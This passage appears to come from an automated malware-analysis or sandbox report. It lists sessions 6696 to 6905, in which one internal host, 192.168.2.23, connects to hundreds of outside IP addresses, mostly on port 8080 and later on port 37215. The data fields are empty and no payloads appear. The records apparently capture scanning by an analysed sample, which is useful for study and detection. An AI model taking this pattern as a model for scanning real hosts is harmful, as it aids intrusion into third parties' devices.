                                                        6696192.168.2.236072279.95.152.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6697192.168.2.234044463.23.198.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6698192.168.2.2337804159.49.251.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6699192.168.2.2340266106.184.221.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6700192.168.2.2340028141.217.198.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6701192.168.2.23454665.194.192.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6702192.168.2.233888842.70.220.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6703192.168.2.2353214164.29.74.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6704192.168.2.233377638.253.65.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6705192.168.2.2336596219.245.29.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6706192.168.2.2336948110.140.88.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6707192.168.2.235904265.183.213.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6708192.168.2.2358528136.226.163.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6709192.168.2.2334262121.62.27.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6710192.168.2.2360468129.105.215.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6711192.168.2.2338170135.247.133.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6712192.168.2.2347974121.243.75.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6713192.168.2.2349268136.50.84.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6714192.168.2.2336718141.226.79.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6715192.168.2.2357356205.199.17.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6716192.168.2.235421896.43.122.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6717192.168.2.234811831.81.208.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6718192.168.2.2334910134.179.99.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6719192.168.2.2338842161.235.50.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6720192.168.2.234898493.223.56.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6721192.168.2.234148691.187.218.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6722192.168.2.2348852165.239.130.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6723192.168.2.2355068206.213.189.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6724192.168.2.2358064143.60.255.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6725192.168.2.2343862209.18.247.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6726192.168.2.2357000119.80.227.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6727192.168.2.23437329.94.230.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6728192.168.2.234828031.221.180.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6729192.168.2.2338978159.169.35.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6730192.168.2.236067278.182.25.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6731192.168.2.233409274.42.90.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6732192.168.2.235054652.250.129.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6733192.168.2.2335570209.62.226.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6734192.168.2.2346404105.160.217.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6735192.168.2.233820675.111.184.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6736192.168.2.235795648.59.66.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6737192.168.2.2338170124.210.189.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6738192.168.2.235207482.110.53.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6739192.168.2.2354476164.49.188.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6740192.168.2.236033862.123.52.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6741192.168.2.2338624124.185.64.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6742192.168.2.2337044158.119.165.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6743192.168.2.235269266.132.152.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6744192.168.2.235498412.3.235.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6745192.168.2.236038676.224.65.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6746192.168.2.234830020.170.10.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6747192.168.2.2333418121.213.192.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6748192.168.2.234778223.201.21.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6749192.168.2.2350226171.96.70.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6750192.168.2.234513265.100.108.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6751192.168.2.235958868.247.34.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6752192.168.2.2346160131.14.205.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6753192.168.2.235661634.242.173.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6754192.168.2.2348172173.62.89.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6755192.168.2.233940693.217.200.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6756192.168.2.235200437.107.139.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6757192.168.2.2356666118.31.232.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6758192.168.2.2353346121.133.178.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6759192.168.2.233777695.211.169.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6760192.168.2.2358450192.92.4.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6761192.168.2.2354404217.125.8.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6762192.168.2.235936231.43.119.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6763192.168.2.2345820201.106.51.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6764192.168.2.2358788170.68.180.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6765192.168.2.2349520144.223.233.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6766192.168.2.234154472.185.35.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6767192.168.2.236086813.44.168.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6768192.168.2.2341128150.152.22.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6769192.168.2.2339136216.66.1.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6770192.168.2.2336542189.180.226.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6771192.168.2.2343296191.115.133.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6772192.168.2.2358834218.9.145.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6773192.168.2.2357114143.236.77.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6774192.168.2.235875278.139.52.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6775192.168.2.23337162.40.127.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6776192.168.2.2340500122.100.48.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6777192.168.2.234966438.86.96.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6778192.168.2.2358880170.153.140.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6779192.168.2.2358172100.44.23.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6780192.168.2.233809478.54.252.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6781192.168.2.233667270.24.105.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6782192.168.2.2338418183.147.19.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6783192.168.2.2344486148.204.107.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6784192.168.2.2354364207.219.66.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6785192.168.2.2351282169.38.79.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6786192.168.2.2348384135.4.92.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6787192.168.2.2345960111.240.0.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6788192.168.2.2351072221.162.208.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6789192.168.2.2354752163.21.101.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6790192.168.2.235509867.56.97.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6791192.168.2.2349600134.133.100.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6792192.168.2.2337386103.151.129.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6793192.168.2.235420843.24.102.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6794192.168.2.235220677.12.44.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6795192.168.2.236099648.23.143.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6796192.168.2.2359804219.7.89.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6797192.168.2.2340386167.67.72.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6798192.168.2.234412634.242.8.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6799192.168.2.234340439.116.124.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6800192.168.2.235848695.251.119.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6801192.168.2.233356475.164.133.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6802192.168.2.2341772137.236.38.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6803192.168.2.2334382135.34.37.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6804192.168.2.2344350144.15.209.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6805192.168.2.234090027.255.119.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6806192.168.2.2345640207.103.231.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6807192.168.2.233749892.190.167.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6808192.168.2.2351846216.19.57.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6809192.168.2.2359072178.207.208.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6810192.168.2.235060297.202.20.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6811192.168.2.234340661.10.229.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6812192.168.2.2335650196.115.249.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6813192.168.2.233408050.41.218.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6814192.168.2.235141086.119.114.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6815192.168.2.2332874160.33.130.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6816192.168.2.2341556129.155.32.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6817192.168.2.2346006153.164.116.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6818192.168.2.234711264.118.22.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6819192.168.2.233826457.71.97.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6820192.168.2.2359212177.27.181.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6821192.168.2.233518896.54.173.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6822192.168.2.2360918149.121.234.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6823192.168.2.2334992161.21.57.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6824192.168.2.2358602110.41.15.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6825192.168.2.2341202169.66.20.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6826192.168.2.233547897.179.65.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6827192.168.2.2333002108.22.195.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6828192.168.2.2344730150.38.189.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6829192.168.2.233343444.111.162.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6830192.168.2.2357674187.178.133.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6831192.168.2.234563418.237.163.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6832192.168.2.233748242.186.142.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6833192.168.2.2357102206.134.11.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6834192.168.2.2338794193.180.148.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6835192.168.2.2354234148.116.99.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6836192.168.2.2344706132.242.139.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6837192.168.2.2351816184.29.154.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6838192.168.2.2349168157.5.117.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6839192.168.2.234633241.118.2.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6840192.168.2.235875688.142.24.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6841192.168.2.2352346132.72.254.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6842192.168.2.2351612197.117.234.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6843192.168.2.2333918197.200.141.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6844192.168.2.235855041.232.146.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6845192.168.2.235982898.127.224.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6846192.168.2.233340241.107.242.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6847192.168.2.2356748197.124.126.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6848192.168.2.2342774197.242.16.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6849192.168.2.2352770157.152.236.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6850192.168.2.233529641.124.138.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6851192.168.2.2342132157.163.154.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6852192.168.2.2333048157.174.203.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6853192.168.2.2349620197.177.150.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6854192.168.2.2360954197.143.12.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6855192.168.2.2334470157.47.93.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6856192.168.2.2358806197.74.36.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6857192.168.2.2347486157.22.109.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6858192.168.2.2356164157.239.67.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6859192.168.2.234026641.236.194.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6860192.168.2.233903041.69.156.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6861192.168.2.2358080197.117.68.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6862192.168.2.2355994197.81.185.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6863192.168.2.2351708197.90.213.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6864192.168.2.2335100196.73.137.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6865192.168.2.2358316157.71.210.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6866192.168.2.233489241.176.181.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6867192.168.2.235503045.153.160.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6868192.168.2.2345566197.219.129.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6869192.168.2.2353822197.226.11.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6870192.168.2.2358444197.144.13.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6871192.168.2.2333106197.51.88.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6872192.168.2.2351718197.250.107.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6873192.168.2.2348336197.98.99.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6874192.168.2.235176676.26.82.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6875192.168.2.2359168197.170.124.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6876192.168.2.2332850133.231.33.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6877192.168.2.2357812133.9.169.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6878192.168.2.233900841.177.201.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6879192.168.2.2359040157.21.224.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6880192.168.2.2332826197.199.146.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6881192.168.2.2339630173.169.163.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6882192.168.2.234930041.38.254.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6883192.168.2.2338632197.143.83.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6884192.168.2.234201641.178.252.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6885192.168.2.233886841.63.114.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6886192.168.2.2357440157.92.78.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6887192.168.2.2334730197.254.107.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6888192.168.2.2350300197.125.29.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6889192.168.2.2348304157.196.0.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6890192.168.2.2357044197.235.168.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6891192.168.2.234277050.177.191.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6892192.168.2.235703634.167.59.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6893192.168.2.2349160197.196.134.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6894192.168.2.2337066157.239.145.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6895192.168.2.234808241.149.94.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6896192.168.2.233894041.105.94.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6897192.168.2.2336188197.56.136.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6898192.168.2.2337040157.5.201.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6899192.168.2.2354432211.228.77.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6900192.168.2.234301041.91.169.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6901192.168.2.233546824.215.195.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6902192.168.2.235361260.65.98.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6903192.168.2.2347306197.4.186.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6904192.168.2.2356762157.228.183.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6905192.168.2.233866223.101.207.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
